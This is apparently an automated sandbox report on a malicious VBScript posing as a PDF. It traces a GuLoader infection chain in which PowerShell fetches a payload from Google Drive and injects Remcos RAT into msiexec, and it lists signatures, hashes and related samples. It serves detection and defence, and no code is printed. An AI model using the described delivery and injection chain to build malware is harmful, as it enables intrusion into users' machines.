              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1633353 Sample: DIR-A_JY4878249#U00b7pdf.vbs Startdate: 10/03/2025 Architecture: WINDOWS Score: 100 32 drive.usercontent.google.com 2->32 34 drive.google.com 2->34 36 2 other IPs or domains 2->36 50 Malicious sample detected (through community Yara rule) 2->50 52 Multi AV Scanner detection for submitted file 2->52 54 Yara detected GuLoader 2->54 56 6 other signatures 2->56 8 powershell.exe 15 2->8         started        11 wscript.exe 1 2->11         started        13 svchost.exe 1 1 2->13         started        16 msiexec.exe 2->16         started        signatures3 process4 dnsIp5 58 Early bird code injection technique detected 8->58 60 Writes to foreign memory regions 8->60 62 Found suspicious powershell code related to unpacking or dynamic code loading 8->62 70 2 other signatures 8->70 18 msiexec.exe 6 8->18         started        21 conhost.exe 8->21         started        64 VBScript performs obfuscated calls to suspicious functions 11->64 66 Suspicious powershell command line found 11->66 68 Wscript starts Powershell (via cmd or directly) 11->68 72 2 other signatures 11->72 23 powershell.exe 14 20 11->23         started        26 PING.EXE 1 11->26         started        42 127.0.0.1 unknown unknown 13->42 signatures6 process7 dnsIp8 44 Detected Remcos RAT 18->44 46 Hides threads from debuggers 18->46 38 drive.google.com 172.217.18.110, 443, 49682, 49683 GOOGLEUS United States 23->38 40 drive.usercontent.google.com 172.217.23.97, 443, 49684, 49697 GOOGLEUS United States 23->40 48 Found suspicious powershell code related to unpacking or dynamic code loading 23->48 28 conhost.exe 23->28         started        30 conhost.exe 26->30         started        signatures9 process10

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              DIR-A_JY4878249#U00b7pdf.vbs10%VirustotalBrowse
              DIR-A_JY4878249#U00b7pdf.vbs11%ReversingLabs
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              http://crl.micro34t)0%Avira URL Cloudsafe
              https://drive.usercontent.google.comp0%Avira URL Cloudsafe
              http://crl.micro240%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              bg.microsoft.map.fastly.net
              199.232.214.172
              truefalse
                high
                edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com
                84.201.210.39
                truefalse
                  high
                  drive.google.com
                  172.217.18.110
                  truefalse
                    high
                    drive.usercontent.google.com
                    172.217.23.97
                    truefalse
                      high
                      Host_6637.6637.6637.657e
                      unknown
                      unknownfalse
                        high
                        NameSourceMaliciousAntivirus DetectionReputation
                        http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.1323764875.00000217997CD000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://drive.googpowershell.exe, 00000004.00000002.1288130859.000002178AF17000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.1288130859.0000021789987000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.1288130859.0000021789987000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://drive.google.com/uc?expowershell.exe, 00000004.00000002.1288130859.000002178AF17000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://drive.google.com/upowershell.exe, 00000004.00000002.1288130859.000002178AF17000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://contoso.com/Licensepowershell.exe, 00000004.00000002.1323764875.00000217997CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://contoso.com/Iconpowershell.exe, 00000004.00000002.1323764875.00000217997CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://crl.ver)svchost.exe, 00000007.00000002.2346044968.0000019940000000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          http://crl.micro34t)powershell.exe, 0000000E.00000002.1641329361.000000000706A000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://drive.usercontent.google.comppowershell.exe, 00000004.00000002.1288130859.0000021789BFF000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://aka.ms/pscore6powershell.exe, 00000004.00000002.1288130859.0000021789761000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://aka.ms/pscore6lBoqpowershell.exe, 0000000E.00000002.1609887195.0000000004751000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://drive.google.powershell.exe, 00000004.00000002.1288130859.000002178AF17000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://drive.gopowershell.exe, 00000004.00000002.1288130859.000002178AF17000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.1288130859.0000021789987000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://drive.goopowershell.exe, 00000004.00000002.1288130859.000002178AF17000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://www.google.compowershell.exe, 00000004.00000002.1288130859.0000021789BFF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1288130859.0000021789BE4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1288130859.0000021789BFB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://drive.gpowershell.exe, 00000004.00000002.1288130859.000002178AF17000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://drive.google.com/ucpowershell.exe, 00000004.00000002.1288130859.000002178AF17000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://g.live.com/odclientsettings/Prod-C:svchost.exe, 00000007.00000003.1203164021.000001993FE1A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://drive.google.com/powershell.exe, 00000004.00000002.1288130859.000002178AF17000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://drive.googlpowershell.exe, 00000004.00000002.1288130859.000002178AF17000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://drive.google.com/uc?epowershell.exe, 00000004.00000002.1288130859.000002178AF17000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://contoso.com/powershell.exe, 00000004.00000002.1323764875.00000217997CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://g.live.com/odclientsettings/ProdV2-C:svchost.exe, 00000007.00000003.1203164021.000001993FDA0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.1323764875.00000217997CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://drive.google.compowershell.exe, 00000004.00000002.1288130859.000002178AF17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1288130859.0000021789987000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://drive.google.cpowershell.exe, 00000004.00000002.1288130859.000002178AF17000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://apis.google.compowershell.exe, 00000004.00000002.1288130859.0000021789BFF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1288130859.0000021789BE4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1288130859.0000021789BFB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://crl.micro24powershell.exe, 0000000E.00000002.1607532734.0000000002C0D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://drive.google.com/uc?powershell.exe, 00000004.00000002.1288130859.000002178AF17000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000004.00000002.1288130859.0000021789761000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1609887195.0000000004751000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://drive.googlepowershell.exe, 00000004.00000002.1288130859.000002178AF17000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://drive.google.copowershell.exe, 00000004.00000002.1288130859.000002178AF17000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        • No. of IPs < 25%
                                                                                        • 25% < No. of IPs < 50%
                                                                                        • 50% < No. of IPs < 75%
                                                                                        • 75% < No. of IPs
                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                        172.217.23.97
                                                                                        drive.usercontent.google.comUnited States
                                                                                        15169GOOGLEUSfalse
                                                                                        172.217.18.110
                                                                                        drive.google.comUnited States
                                                                                        15169GOOGLEUSfalse
                                                                                        IP
                                                                                        127.0.0.1
                                                                                        Joe Sandbox version:42.0.0 Malachite
                                                                                        Analysis ID:1633353
                                                                                        Start date and time:2025-03-10 09:12:20 +01:00
                                                                                        Joe Sandbox product:CloudBasic
                                                                                        Overall analysis duration:0h 7m 15s
                                                                                        Hypervisor based Inspection enabled:false
                                                                                        Report type:full
                                                                                        Cookbook file name:default.jbs
                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                        Number of analysed new started processes analysed:22
                                                                                        Number of new started drivers analysed:0
                                                                                        Number of existing processes analysed:0
                                                                                        Number of existing drivers analysed:0
                                                                                        Number of injected processes analysed:1
                                                                                        Technologies:
                                                                                        • HCA enabled
                                                                                        • EGA enabled
                                                                                        • AMSI enabled
                                                                                        Analysis Mode:default
                                                                                        Analysis stop reason:Timeout
                                                                                        Sample name:DIR-A_JY4878249#U00b7pdf.vbs
                                                                                        renamed because original name is a hash value
                                                                                        Original Sample Name:DIR-A_JY4878249pdf.vbs
                                                                                        Detection:MAL
                                                                                        Classification:mal100.troj.expl.evad.winVBS@13/13@3/3
                                                                                        EGA Information:Failed
                                                                                        HCA Information:
                                                                                        • Successful, ratio: 81%
                                                                                        • Number of executed functions: 40
                                                                                        • Number of non-executed functions: 8
                                                                                        Cookbook Comments:
                                                                                        • Found application associated with file extension: .vbs
                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, consent.exe, SIHClient.exe, Sgrmuserer.exe, conhost.exe, svchost.exe
                                                                                        • Excluded IPs from analysis (whitelisted): 84.201.210.39, 23.60.203.209, 172.202.163.200
                                                                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, e16604.f.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, c.pki.goog, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                                                        • Execution Graph export aborted for target msiexec.exe, PID 7328 because there are no executed function
                                                                                        • Execution Graph export aborted for target powershell.exe, PID 5904 because it is empty
                                                                                        • Execution Graph export aborted for target powershell.exe, PID 6344 because it is empty
                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                        TimeTypeDescription
                                                                                        04:13:16API Interceptor1x Sleep call for process: wscript.exe modified
                                                                                        04:13:19API Interceptor137x Sleep call for process: powershell.exe modified
                                                                                        04:13:31API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                        No context
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comSecuriteInfo.com.Win64.DropperX-gen.32756.21147.exeGet hashmaliciousUnknownBrowse
                                                                                        • 217.20.57.35
                                                                                        Purchase Order.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                        • 217.20.57.36
                                                                                        Royal Mail Inland Claim Form V1.3.xlsmGet hashmaliciousUnknownBrowse
                                                                                        • 217.20.57.18
                                                                                        kDubrmi6B5.msiGet hashmaliciousMetastealerBrowse
                                                                                        • 217.20.57.19
                                                                                        Damage product 3.vbsGet hashmaliciousAsyncRAT, Batch Injector, VenomRATBrowse
                                                                                        • 217.20.57.34
                                                                                        skf7iF4.batGet hashmaliciousUnknownBrowse
                                                                                        • 84.201.210.39
                                                                                        ADFoyxP.exeGet hashmaliciousKeyLogger, StormKitty, VenomRATBrowse
                                                                                        • 84.201.210.39
                                                                                        GGP_DOCUMENTO CITACION AUDIENCIA_GGP.svgGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                                        • 217.20.57.18
                                                                                        HvEuiXibGt.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                                                                        • 217.20.57.35
                                                                                        desaremix.exeGet hashmaliciousKillMBRBrowse
                                                                                        • 217.20.57.35
                                                                                        bg.microsoft.map.fastly.netPOETDB24-25771.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                        • 199.232.210.172
                                                                                        TNOR_CYCLE_C2_250000615284_32106010359796_E_BDA_0_E_20250310_192757#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                        • 199.232.210.172
                                                                                        cv(german-v).pdfGet hashmaliciousUnknownBrowse
                                                                                        • 199.232.214.172
                                                                                        RYvYMFbc37.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                                                                        • 199.232.210.172
                                                                                        xwM9kaAoeY.batGet hashmaliciousUnknownBrowse
                                                                                        • 199.232.214.172
                                                                                        6DRdNEnOMn.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        • 199.232.210.172
                                                                                        fg.exeGet hashmaliciousXWormBrowse
                                                                                        • 199.232.214.172
                                                                                        FUJFazcSyr.exeGet hashmaliciousAsyncRAT, DarkTortilla, XWormBrowse
                                                                                        • 199.232.210.172
                                                                                        Loader.exeGet hashmaliciousQuasarBrowse
                                                                                        • 199.232.210.172
                                                                                        zabwpkovl0.exeGet hashmaliciousUnknownBrowse
                                                                                        • 199.232.214.172
                                                                                        No context
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        3b5074b1b5d032e5620f69f9f700ff0ez1PO1164031.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                        • 172.217.18.110
                                                                                        • 172.217.23.97
                                                                                        Transferencia Bancaria I2241624AH.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 172.217.18.110
                                                                                        • 172.217.23.97
                                                                                        URGENTE Ref.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                        • 172.217.18.110
                                                                                        • 172.217.23.97
                                                                                        9098398293892.exeGet hashmaliciousDarkTortilla, MSIL Logger, MassLogger RATBrowse
                                                                                        • 172.217.18.110
                                                                                        • 172.217.23.97
                                                                                        TNOR_CYCLE_C2_250000615284_32106010359796_E_BDA_0_E_20250310_192757#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                        • 172.217.18.110
                                                                                        • 172.217.23.97
                                                                                        rQuotation020525SA.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                        • 172.217.18.110
                                                                                        • 172.217.23.97
                                                                                        z68cryptednowwww.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 172.217.18.110
                                                                                        • 172.217.23.97
                                                                                        FRoijLOGX5.exeGet hashmaliciousQuasarBrowse
                                                                                        • 172.217.18.110
                                                                                        • 172.217.23.97
                                                                                        https://get.activated.winGet hashmaliciousUnknownBrowse
                                                                                        • 172.217.18.110
                                                                                        • 172.217.23.97
                                                                                        https://get.activated.winGet hashmaliciousUnknownBrowse
                                                                                        • 172.217.18.110
                                                                                        • 172.217.23.97
                                                                                        37f463bf4616ecd445d4a1937da06e19REQ DAMMAM HO PROJECT.exeGet hashmaliciousGuLoaderBrowse
                                                                                        • 172.217.18.110
                                                                                        • 172.217.23.97
                                                                                        Salary List_pdf.bat.exeGet hashmaliciousGuLoaderBrowse
                                                                                        • 172.217.18.110
                                                                                        • 172.217.23.97
                                                                                        REQ DAMMAM HO PROJECT.exeGet hashmaliciousGuLoaderBrowse
                                                                                        • 172.217.18.110
                                                                                        • 172.217.23.97
                                                                                        URGENTE Ref.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                        • 172.217.18.110
                                                                                        • 172.217.23.97
                                                                                        Salary List_pdf.bat.exeGet hashmaliciousGuLoaderBrowse
                                                                                        • 172.217.18.110
                                                                                        • 172.217.23.97
                                                                                        New Order.exeGet hashmaliciousDBatLoader, DarkCloudBrowse
                                                                                        • 172.217.18.110
                                                                                        • 172.217.23.97
                                                                                        TNOR_CYCLE_C2_250000615284_32106010359796_E_BDA_0_E_20250310_192757#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                        • 172.217.18.110
                                                                                        • 172.217.23.97
                                                                                        SecuriteInfo.com.Variant.Fragtor.519143.11279.16206.exeGet hashmaliciousPoverty StealerBrowse
                                                                                        • 172.217.18.110
                                                                                        • 172.217.23.97
                                                                                        SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeGet hashmaliciousPoverty StealerBrowse
                                                                                        • 172.217.18.110
                                                                                        • 172.217.23.97
                                                                                        No context
                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):1310720
                                                                                        Entropy (8bit):0.880768212677527
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:0JVRkX56mk0alaS0aHH0anjJ8PUWJ81s5J8RMvCxwtYD0pQoltqNeveEQYQ1aG9G:0J7adfWuK0p/QDfKoPeuP0aN4fqox9
                                                                                        MD5:AAB5ACBCCA3110BC4404E7995581050E
                                                                                        SHA1:4BDA38A42F40F77CAAA7E7DA1C74B916C1E56833
                                                                                        SHA-256:2CB2C1F2E6930C2E3271D081DA1A847557FFB7C2A8404E93EE5AD784771B6DBA
                                                                                        SHA-512:E53FDF193E9B9B5AFE172E1B6A2B1DB2F7C3B51F89F9BF05CF3227F3604481086ADE13E592E8A489091745C9B4A59754C572A416E269A508B7EDC7CAC01DAC9E
                                                                                        Malicious:false
                                                                                        Preview:2.e.........@..@12...{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.................................K<...kS..#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0x59eb33b2, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                        Category:dropped
                                                                                        Size (bytes):1310720
                                                                                        Entropy (8bit):0.788050365992035
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:PSB2ESB2SSjlK/lv4T9DY1k0aXjJ8VQVYkr3g16iq2UPkLk+kYv/gKr51KrgzAkv:PazaPv4V4fXq2UaB
                                                                                        MD5:C4E247B4178DBF1573ACB05B1CC6B770
                                                                                        SHA1:6E93AF8F6CFD20ED66B63A802BF4DF74D282AE61
                                                                                        SHA-256:2ABD86D5AF8C87ED9935176A6B767DCB7FD6636582647892B8BF2B98765147D0
                                                                                        SHA-512:4C0515096CD50B8F0E65B67193B6B79574E59A40D5EFB29033002822BA4545A9D2AE01DC5EB8A843D8F3CCB861D74C3A342A5288DA4E9A4A25047562DE6377D5
                                                                                        Malicious:false
                                                                                        Preview:Y.3.... ...............X\...;...{......................X............{.......}..h...........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... .......12...{...............................................................................................................................................................................................2...{..................................c.w......}...................'|......}...........................#......h.......................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):16384
                                                                                        Entropy (8bit):0.08063945759238714
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:6Fz//EYeNVTXlVG0+q2Iqe8louFillNTt/4ll/Q6beV/:6FzXEzNV7GE8ldFGHtc6V
                                                                                        MD5:E69AFA2455226FF4A16BE5F171C319C7
                                                                                        SHA1:2A2C3B3C0680C2360928DDC710BD902AEDD0A9B3
                                                                                        SHA-256:C1CD992B8B9E15D2E07A14B2BC7A55F1AF8A735EB5134BF75C36E56406797FF8
                                                                                        SHA-512:FCA42AEC1B98F6CFB8FB219009ED3725503F6124211074126A7540DAB3025C390AB16CB5EF76F4AB0ED3C9E0035626544EB44D31523DEB2388CCCE96FDF4E2DB
                                                                                        Malicious:false
                                                                                        Preview:.. ......................................;...{.......}.......{...............{.......{....:......{..................'|......}..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\Windows\System32\wscript.exe
                                                                                        File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 73305 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                        Category:dropped
                                                                                        Size (bytes):73305
                                                                                        Entropy (8bit):7.996028107841645
                                                                                        Encrypted:true
                                                                                        SSDEEP:1536:krha8mqJ7v3CeFMz/akys7nSTK7QMuK+C/Oh5:kAOFq+Mba9Ok7C/O/
                                                                                        MD5:83142242E97B8953C386F988AA694E4A
                                                                                        SHA1:833ED12FC15B356136DCDD27C61A50F59C5C7D50
                                                                                        SHA-256:D72761E1A334A754CE8250E3AF7EA4BF25301040929FD88CF9E50B4A9197D755
                                                                                        SHA-512:BB6DA177BD16D163F377D9B4C63F6D535804137887684C113CC2F643CEAB4F34338C06B5A29213C23D375E95D22EF417EAC928822DFB3688CE9E2DE9D5242D10
                                                                                        Malicious:false
                                                                                        Preview:MSCF....Y.......,...................I.................;Za. .authroot.stl.98.?.6..CK..<Tk......4..c... .Ec...U.d.d.E&I.DH*..M.KB."..rK.RQ*..}f..f...}..1....9...........$.8q..fa...7.o.1.0...bfsM4.........u..l..0..4.a.t....0.....6#....n. :... ....%.,CQ5uU..(.3.<7#.0..JN.$...=j|w..*.#.oU..Eq[..P..^..~.V...;..m...I|...l..@-W..=.QQ.._./.M.nZ..(.........`.$Z.9wW:W.]..8*E.......I.D{..n...K:.m..^.(.S.......c..s.y..<...2.%o.o.....H.B.R.....11.|!.(...........h.SZ........<...^....Z>.Pp?... .pT@p.#.&..........#VEV=.....p........y..."T=l.n..egf.w..X.Y..-G...........KQ.]...pM..[m..-6.wd:........T...:.P5Zs....c.oT`..F1#......EuD.......7....V ..-....!.N..%S...k...S. ...@.J..../..b!B.(=\../.l......`.\...q9..>4!b..8EH.....zdy.....#...X>%0w...i.,>c.z.g"p.S..2W.+mMs.....5Def.....#._D.4....>}...i...\.&`D.......z;..ZY.3.+t.`....z_.q'w.z.)..j3.+.co.s..:.........qK...{...E....uPO...#vs.XxH.B!..(t. 8k+.....G\..?..GF8....'..w.>.ms..\ve.nFN..W)....xi..u..5.f.l....
                                                                                        Process:C:\Windows\System32\wscript.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):330
                                                                                        Entropy (8bit):3.1813640230725673
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:kKR+gmcvSN+SkQlPlEGYRMY9z+4KlDA3RUeqpGVuys1:JlmCkPlE99SNxAhUeq8S
                                                                                        MD5:3987E7701BD6AFB2E4E849D37A4A1E5B
                                                                                        SHA1:E7B0F4C662B4A9F872D5071FEA0BAD7C11EB3232
                                                                                        SHA-256:4B2663A5C1EA2197362BBB3A8AD2D120768663F0D847C166CF8430ADF6E2CBD6
                                                                                        SHA-512:71A14CB6B9278CCB891F934C512FEF528647C28C11C4423BC45831ADCBEAA117BE104B207E595F9BB577E2E3FEFD9538C70E2F4BBD3FC8E5F2AAD4874213EA61
                                                                                        Malicious:false
                                                                                        Preview:p...... ........h..F....(....................................................... ..................(...........Y...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".6.4.2.7.f.6.c.2.b.7.8.7.d.b.1.:.0."...
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):11608
                                                                                        Entropy (8bit):4.8908305915084105
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:yVsm5eml2ib4LxoeRm3YrKkzYFQ9smKp5pVFn3eGOVpN6K3bkkjo5xgkjDt4iWNH:yCib4PYbLVoGIpN6KQkj2qkjh4iUx6iP
                                                                                        MD5:FE1902820A1CE8BD18FD85043C4D9C5C
                                                                                        SHA1:62F24EAE4A42BA3AE454A6FAB07EF47D1FE9DFD6
                                                                                        SHA-256:8BBDC66564B509C80EA7BE85EA9632ACD0958008624B829EA4A24895CA73D994
                                                                                        SHA-512:8D1BADE448F0C53D6EC00BC9FACDBCB1D4B1B7C61E91855206A08BDBF61C6E4A40210574C4193463C8A13AE692DD80897F3CE9E39958472705CF17D77FE9C1D9
                                                                                        Malicious:false
                                                                                        Preview:PSMODULECACHE.....$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module........Find-Command........Unregister-PSRepository........Get-InstalledScript........Get-DynamicOptions........Add-PackageSource........Register-PSRepository........Find-DscResource........Publish-Script........Find-RoleCapability........Uninstall-Package........Get-PackageDependencies........pumo........fimo........Find-Script........Initialize-Provider........Get-PackageProviderName........Test-ScriptFileInfo........Get-InstalledModule........Update-ScriptFileInfo........Get-InstalledPackage........Resolve-PackageSource........Uninstall-Module........inmo........Remove-PackageSource........Update-Script........Uninstall-Script........Update-ModuleManifest........Get-Feature........Install-Module........Install-Package........New-ScriptFileInfo...